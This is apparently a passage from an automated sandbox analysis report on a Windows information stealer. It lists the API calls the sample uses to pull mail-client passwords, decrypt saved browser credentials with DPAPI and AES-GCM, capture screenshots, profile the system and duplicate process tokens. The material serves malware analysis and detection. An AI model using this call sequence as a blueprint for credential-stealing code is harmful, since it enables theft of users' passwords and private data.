                    • lstrlenW.KERNEL32(POP3 Port), ref: 004351F6
                    • wsprintfA.USER32 ref: 00435222
                    • lstrlenA.KERNEL32(?), ref: 0043522F
                    • lstrlenW.KERNEL32(?), ref: 00434FA4
                      • Part of subcall function 00445EF8: _free.LIBCMT ref: 00445F0B
                    • lstrlenW.KERNEL32(SMTP Email Address), ref: 00434F80
                      • Part of subcall function 00435E7F: lstrlenA.KERNEL32(?,?,74E069A0,?,?), ref: 00435EB0
                      • Part of subcall function 00435E7F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435ECF
                      • Part of subcall function 00435E7F: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435EF2
                      • Part of subcall function 00435E7F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 00435F1E
                      • Part of subcall function 00435F3C: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00428B6A,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435F61
                      • Part of subcall function 00435F3C: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00428B6A,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435F88
                    • lstrlenW.KERNEL32(POP3 Password2), ref: 00435023
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
                    • String ID: %d$,GTG$Email$HTTP Password$HTTP Server URL$HTTP User$HTTPMail Password2$HTTPMail Server$HTTPMail User Name$IMAP Password$IMAP Password2$IMAP Port$IMAP Server$IMAP User$IMAP User Name$NNTP Email Address$NNTP Password$NNTP Password2$NNTP Server$NNTP User Name$POP3 Password$POP3 Password2$POP3 Port$POP3 Server$POP3 User$POP3 User Name$SMTP Email Address$SMTP Password$SMTP Password2$SMTP Port$SMTP Server$SMTP User$SMTP User Name$TG
                    • API String ID: 2832241015-500306767
                    • Opcode ID: af0bd4e48e7613f9bce012bbb5873f0bcfadf6bd648b7d6a35e4645e68ff955c
                    • Instruction ID: 6b0236c2990cafd62e27a7ba6c709938415de8c04d3cd6eed35e99d3f0bc5167
                    • Opcode Fuzzy Hash: af0bd4e48e7613f9bce012bbb5873f0bcfadf6bd648b7d6a35e4645e68ff955c
                    • Instruction Fuzzy Hash: E2B17371E006189BEF00DF96C8457EE7BB9AF48304F14C19AE409BB345DBB85A45CB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004292A8
                    • LoadLibraryA.KERNEL32(?), ref: 004292FE
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042934E
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042938E
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004293D2
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042940F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042944D
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00429488
                    • lstrlenW.KERNEL32(?), ref: 0042954C
                    • lstrcpyW.KERNEL32 ref: 00429567
                    • lstrlenW.KERNEL32(?), ref: 00429574
                    • lstrcpyW.KERNEL32 ref: 00429593
                    • lstrlenW.KERNEL32(?), ref: 004295A0
                    • lstrcpyW.KERNEL32 ref: 004295C4
                    • lstrlenW.KERNEL32(?), ref: 004295F8
                    • lstrcpyW.KERNEL32 ref: 00429619
                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00429730
                    • lstrlenW.KERNEL32(00000000), ref: 0042973B
                    • lstrlenW.KERNEL32(?), ref: 0042974B
                    • FreeLibrary.KERNEL32(00000000), ref: 004297D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
                    • String ID: Internet Explorer
                    • API String ID: 4222390991-1412615936
                    • Opcode ID: 891387ccf1acc239c587a8b22ce97c845f823d6502884acdb1a529ed24d4ea47
                    • Instruction ID: 7495c99ff08519f8c1d48bc4601cad1e2ca3606a2f54b4a73c09033788219a8c
                    • Opcode Fuzzy Hash: 891387ccf1acc239c587a8b22ce97c845f823d6502884acdb1a529ed24d4ea47
                    • Instruction Fuzzy Hash: AEF19F71D002689FEF14CFA9EC49BEEBBB8EF49304F14046AE405E7251DB789945CB29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041F3FA
                      • Part of subcall function 004360CE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 0043611A
                      • Part of subcall function 00435C2D: __EH_prolog.LIBCMT ref: 00435C32
                      • Part of subcall function 00435C2D: _strcat.LIBCMT ref: 00435C8D
                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000), ref: 0041F5CB
                      • Part of subcall function 0041F280: __EH_prolog.LIBCMT ref: 0041F285
                    • LoadLibraryA.KERNEL32(00000000), ref: 0041F8C1
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041F90D
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041F94B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041F98C
                    • GetProcAddress.KERNEL32(00000000,3838256B), ref: 0041F9CE
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FA02
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FA30
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FA6E
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FA9F
                    • GetProcAddress.KERNEL32(00000000,1A1F0200), ref: 0041FADF
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FB14
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FB44
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041FB8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
                    • String ID: DYYUCdc~$.@Ym$2AC^[FmQ^]AW$AW$\jM7vK.zip$\nss3.dll$exi?$fB9oV$k%88
                    • API String ID: 1501777685-2119776792
                    • Opcode ID: 92de773e7742cf532dc433262a7b54763d75f80b34c918edf0931901fa753dee
                    • Instruction ID: 61e9ef335a2439aff57a97b973672b4e12074fb28fe19d93eafc188e08c6205b
                    • Opcode Fuzzy Hash: 92de773e7742cf532dc433262a7b54763d75f80b34c918edf0931901fa753dee
                    • Instruction Fuzzy Hash: 7532F430D05288CADF15EFB9D8507EEBBB1AF59308F14447ED401A7292DB784A8ACB5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0042B178
                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042B1A6
                    • GetDesktopWindow.USER32 ref: 0042B1AC
                    • GetWindowRect.USER32 ref: 0042B1B9
                    • GetWindowDC.USER32(00000000), ref: 0042B1C0
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042B1E0
                    • CreateCompatibleDC.GDI32(00000000), ref: 0042B1E9
                    • CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042B234
                    • DeleteDC.GDI32(00000000), ref: 0042B248
                    • DeleteDC.GDI32(?), ref: 0042B24D
                    • SaveDC.GDI32(00000000), ref: 0042B254
                    • SelectObject.GDI32(00000000,?), ref: 0042B260
                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042B279
                    • RestoreDC.GDI32(00000000,00000000), ref: 0042B281
                    • DeleteDC.GDI32(00000000), ref: 0042B28E
                    • DeleteDC.GDI32(?), ref: 0042B293
                    • GdipAlloc.GDIPLUS(00000010), ref: 0042B297
                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042B2B7
                    • _mbstowcs.LIBCMT ref: 0042B32A
                    • GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042B347
                    • DeleteObject.GDI32(00000010), ref: 0042B36C
                    • GdiplusShutdown.GDIPLUS(?), ref: 0042B375
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
                    • String ID: (
                    • API String ID: 4140672344-3887548279
                    • Opcode ID: 5b6ff0c939cf20289dc7472261dd6c58dd017177ebd5c63eba3923d051137882
                    • Instruction ID: 283a2514f48b72236c8223719904cbcd7be021b708eb26886556e2c9ba847a87
                    • Opcode Fuzzy Hash: 5b6ff0c939cf20289dc7472261dd6c58dd017177ebd5c63eba3923d051137882
                    • Instruction Fuzzy Hash: E27108B5D00229EFDB11DFA5DD849AEBBF8FF08340F10452AE916E7210E7B459418F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040D1A8
                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000048,?,?,00000048,?), ref: 0040D4BC
                    • HeapFree.KERNEL32(00000000,?,?,?,00000048,?,?,00000048,?), ref: 0040D4C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeH_prologProcess
                    • String ID: "},$H$Opera$\$v10
                    • API String ID: 3114893737-2563924897
                    • Opcode ID: dcf58c7411871618692554e6dbb89c14f097b85117cd12793b88e222c48cb987
                    • Instruction ID: 80fd19dcee3a50ec9b55a736011511a12cfa6ba3e8d7464048d8d0a96927ce28
                    • Opcode Fuzzy Hash: dcf58c7411871618692554e6dbb89c14f097b85117cd12793b88e222c48cb987
                    • Instruction Fuzzy Hash: B7D2AE70D00258CBDB15EFA5C891BEDBBB0AF54304F1085AEE50977292EB385B89CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00437D4F
                      • Part of subcall function 004378ED: __EH_prolog.LIBCMT ref: 004378F2
                      • Part of subcall function 004378ED: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 00437992
                      • Part of subcall function 004378ED: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004379E0
                      • Part of subcall function 004378ED: RegCloseKey.ADVAPI32(?), ref: 004379E9
                      • Part of subcall function 004525EA: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004525FD
                      • Part of subcall function 004525EA: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045262E
                    • _strftime.LIBCMT ref: 00437E82
                    • GetUserDefaultLCID.KERNEL32(00001001,?,00000100), ref: 00437EAB
                    • GetLocaleInfoA.KERNEL32(00000000), ref: 00437EB2
                    • GetUserNameA.ADVAPI32(?,00000101), ref: 00438055
                    • GetComputerNameA.KERNEL32(?,00000101), ref: 004386E6
                      • Part of subcall function 00414A6F: __EH_prolog.LIBCMT ref: 00414A74
                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0043875B
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,00000001), ref: 00438A80
                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000001), ref: 00438B70
                    • GetSystemMetrics.USER32 ref: 00438CFB
                    • GetSystemMetrics.USER32 ref: 00438D25
                    • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438DB1
                    • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 00438E0B
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: System$H_prologNameUser$DevicesDisplayEnumInfoMetricsTime$CloseComputerDefaultFileGlobalLocaleMemoryOpenQueryStatusUnothrow_t@std@@@Value__ehfuncinfo$??2@_strftime
                    • String ID: 2$>$@$aE5-mO-4m_A
                    • API String ID: 499160968-1989814004
                    • Opcode ID: bb64027eca7529b9265729608b204dec0241819399e8f48b1bee5eef6af9d3ed
                    • Instruction ID: 764d1ce9cca75e2bd270c3566c19b4b36a0037ca5c91e68f97e9114094c4d419
                    • Opcode Fuzzy Hash: bb64027eca7529b9265729608b204dec0241819399e8f48b1bee5eef6af9d3ed
                    • Instruction Fuzzy Hash: 37A20630A043A88BDF21DB75C8517DEB7B1AF95304F1095EEE48967202EB784F89CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040F18B
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F1E5
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F229
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F277
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F2C4
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F30E
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F358
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F39B
                    • GetProcAddress.KERNEL32(?,?), ref: 0040F3DD
                    • wsprintfA.USER32 ref: 0040F456
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                      • Part of subcall function 00435CAD: __EH_prolog.LIBCMT ref: 00435CB2
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FD66
                      • Part of subcall function 0040CB3A: __EH_prolog.LIBCMT ref: 0040CB3F
                      • Part of subcall function 0040CB3A: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040CBA8
                      • Part of subcall function 0040CB3A: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040CBC6
                      • Part of subcall function 0040CB3A: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040CBE7
                      • Part of subcall function 0040CB3A: LocalAlloc.KERNEL32(00000040,?), ref: 0040CC38
                      • Part of subcall function 0040CB3A: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040CC60
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FE4A
                      • Part of subcall function 0040C9FC: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA0F
                      • Part of subcall function 0040C9FC: DeleteFileTransactedA.KERNEL32 ref: 0040CA26
                      • Part of subcall function 0040C9FC: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA31
                      • Part of subcall function 0040E697: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040E6C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Crypt$H_prolog$DataDeallocateTransactionUnprotect$AlgorithmAllocCommitCreateDecryptDeleteFileGenerateIos_base_dtorLocalOpenPropertyProviderSymmetricTransactedstd::ios_base::_wsprintf
                    • String ID: "},$360Browser$Opera$UCBrowser$v10
                    • API String ID: 1957576696-3198395839
                    • Opcode ID: 9c2a96273d190a5193ca7e63cfdbba64afd66c72949db0a161453f2a4421a078
                    • Instruction ID: c5e0bc0f66a7ece195833330dd5cb062d78249d63d81eb057ee3355757520827
                    • Opcode Fuzzy Hash: 9c2a96273d190a5193ca7e63cfdbba64afd66c72949db0a161453f2a4421a078
                    • Instruction Fuzzy Hash: B7B2BA30D002689BDB21DB65CC95BEDBBB0AF59304F1045EAE449B7292EB741BC8CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041032C
                    • GetProcAddress.KERNEL32(?,?), ref: 0041037A
                    • GetProcAddress.KERNEL32(?,?), ref: 004103AC
                    • GetProcAddress.KERNEL32(?,?), ref: 004103EB
                    • GetProcAddress.KERNEL32(?,?), ref: 00410423
                    • GetProcAddress.KERNEL32(?,?), ref: 00410458
                    • GetProcAddress.KERNEL32(?,?), ref: 0041048D
                    • GetProcAddress.KERNEL32(?,?), ref: 004104BE
                    • GetProcAddress.KERNEL32(?,?), ref: 00410500
                    • wsprintfA.USER32 ref: 0041057A
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00410C27
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 0040CB3A: __EH_prolog.LIBCMT ref: 0040CB3F
                      • Part of subcall function 0040CB3A: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040CBA8
                      • Part of subcall function 0040CB3A: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040CBC6
                      • Part of subcall function 0040CB3A: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040CBE7
                      • Part of subcall function 0040CB3A: LocalAlloc.KERNEL32(00000040,?), ref: 0040CC38
                      • Part of subcall function 0040CB3A: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040CC60
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00410D08
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Crypt$DataDeallocateH_prologUnprotect$AlgorithmAllocDecryptGenerateLocalOpenPropertyProviderSymmetricwsprintf
                    • String ID: "},$360Browser$Opera$UCBrowser$v10
                    • API String ID: 3829445001-3198395839
                    • Opcode ID: 82841d2281ec6592ed7b0697fc47b2ca6efcb1c9986d488f20dfad29e21c76b1
                    • Instruction ID: 9bafb8d21b0bc4690e0ccdc6f06a9653c13b1314b456fd9444baeaf13ef80361
                    • Opcode Fuzzy Hash: 82841d2281ec6592ed7b0697fc47b2ca6efcb1c9986d488f20dfad29e21c76b1
                    • Instruction Fuzzy Hash: 3A72CB30C01258DBDF11DFA5CC91AEEBBB1AF59308F1040AEE449A7252EB745BC9CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00428EE9
                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 00428F0A
                    • lstrlenW.KERNEL32 ref: 00428F19
                    • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 00428F2C
                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,00000000), ref: 00428F4F
                    • wsprintfW.USER32 ref: 00428F8B
                    • lstrcatW.KERNEL32(00000000,?), ref: 00428F99
                    • wsprintfW.USER32 ref: 00428FB9
                    • lstrcatW.KERNEL32(00000000,?), ref: 00428FC7
                    • CryptDestroyHash.ADVAPI32(?,?,00000000,00000000), ref: 00428FD0
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00428FDB
                    • lstrlenW.KERNEL32 ref: 00429022
                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000001,?), ref: 00429045
                    • LocalFree.KERNEL32(00000000), ref: 0042907E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                    • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                    • API String ID: 1004607082-2450551051
                    • Opcode ID: 40d51e538c2382ce9ecd96f884ad9d58b5206b79970620aba4a40baa9dfb2b9b
                    • Instruction ID: 4345c4c5f1c32d4199cd139d7f8ef0efda056ddd6d25cda5fdce87c72dcee66b
                    • Opcode Fuzzy Hash: 40d51e538c2382ce9ecd96f884ad9d58b5206b79970620aba4a40baa9dfb2b9b
                    • Instruction Fuzzy Hash: 39512F72E00219AFEB119BA5DC45FFF77BCEF44300F14402AF505E6291EAB89A05CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040E6E2
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E72D
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E75F
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E79E
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E7D6
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E80B
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E83C
                    • GetProcAddress.KERNEL32(?,?), ref: 0040E87E
                    • wsprintfA.USER32 ref: 0040E8F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$H_prologwsprintf
                    • String ID: "},$Opera$v10
                    • API String ID: 3606448584-2774946106
                    • Opcode ID: 6b0f85ef27664482c16246818893a7db2980a484426620b114d8440e1307f3e0
                    • Instruction ID: 19e351383c98b94b4a67ee097c5e4352e0ebe081a7d42689625539601951e539
                    • Opcode Fuzzy Hash: 6b0f85ef27664482c16246818893a7db2980a484426620b114d8440e1307f3e0
                    • Instruction Fuzzy Hash: 28629030D00258DBDF10EFA5CC91AEDBBB4AF58304F1084AEE449B7291EB745A89CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0043930D
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00439371
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0043938B
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,000000FF,?,00000000), ref: 004393FF
                    • OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,00000000), ref: 00439411
                    • DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,00000000), ref: 0043942C
                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00439439
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000), ref: 0043944C
                    • _strlen.LIBCMT ref: 00439459
                    • _mbstowcs.LIBCMT ref: 0043946E
                    • CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00439488
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0043948F
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004394A1
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$CloseCreateHandleOpenProcess32$DuplicateFileFirstH_prologModuleNameNextSnapshotToolhelp32With_mbstowcs_strlen
                    • String ID:
                    • API String ID: 1291480875-0
                    • Opcode ID: c211778cb27928c1ae00d3f3f030889bc4e7f5e5bc355da2d6fcda664850e8f5
                    • Instruction ID: c21ccb8e75ff212baf7a07e0a97d6ea99e389185ab1b6222251fc7ceed3f9369
                    • Opcode Fuzzy Hash: c211778cb27928c1ae00d3f3f030889bc4e7f5e5bc355da2d6fcda664850e8f5
                    • Instruction Fuzzy Hash: A6419471900219AFDB10DFA1DC85AEFB7BDFF48304F00806AF901A6251EBB44E49CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040CB3F
                    • BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040CBA8
                    • BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040CBC6
                    • BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040CBE7
                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040CC38
                    • BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040CC60
                    • BCryptCloseAlgorithmProvider.BCRYPT(00000000,00000000), ref: 0040CCC5
                    • BCryptDestroyKey.BCRYPT(00000000), ref: 0040CCD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$AlgorithmProvider$AllocCloseDecryptDestroyGenerateH_prologLocalOpenPropertySymmetric
                    • String ID: AES$ChainingMode$ChainingModeGCM
                    • API String ID: 709062000-1213888626
                    • Opcode ID: 71f0ac93415e5f4f7549831106420273038b00db0d05cbc81885933dc66d2219
                    • Instruction ID: bf4f281e8e412c5d07de2649efb49659524830c82d6bba9acf1feb025742385c
                    • Opcode Fuzzy Hash: 71f0ac93415e5f4f7549831106420273038b00db0d05cbc81885933dc66d2219
                    • Instruction Fuzzy Hash: 35518DB1900208EFEB10DF95D985AEEBBB8FF48308F10452FF515A7281D7789A44CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /$UT
                    • API String ID: 0-1626504983
                    • Opcode ID: b1f2ce15b8cc195593407b982e4e7d836e8813fe144ab9c5915432487165c722
                    • Instruction ID: 734a6b51efb159dbdb7144a49b03714174e6699667316ce73f244b3ddfe6a663
                    • Opcode Fuzzy Hash: b1f2ce15b8cc195593407b982e4e7d836e8813fe144ab9c5915432487165c722
                    • Instruction Fuzzy Hash: CD02B070A093419FDB25DF6AD4807ABB7E4AF98308F14182FF48587391D778E849CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00429E60
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000), ref: 00429F69
                    • CloseHandle.KERNEL32(00000000), ref: 00429F77
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00429FB3
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429FDC
                    • CloseHandle.KERNEL32(00000000), ref: 00429FE3
                      • Part of subcall function 0040C9FC: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA0F
                      • Part of subcall function 0040C9FC: DeleteFileTransactedA.KERNEL32 ref: 0040CA26
                      • Part of subcall function 0040C9FC: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA31
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
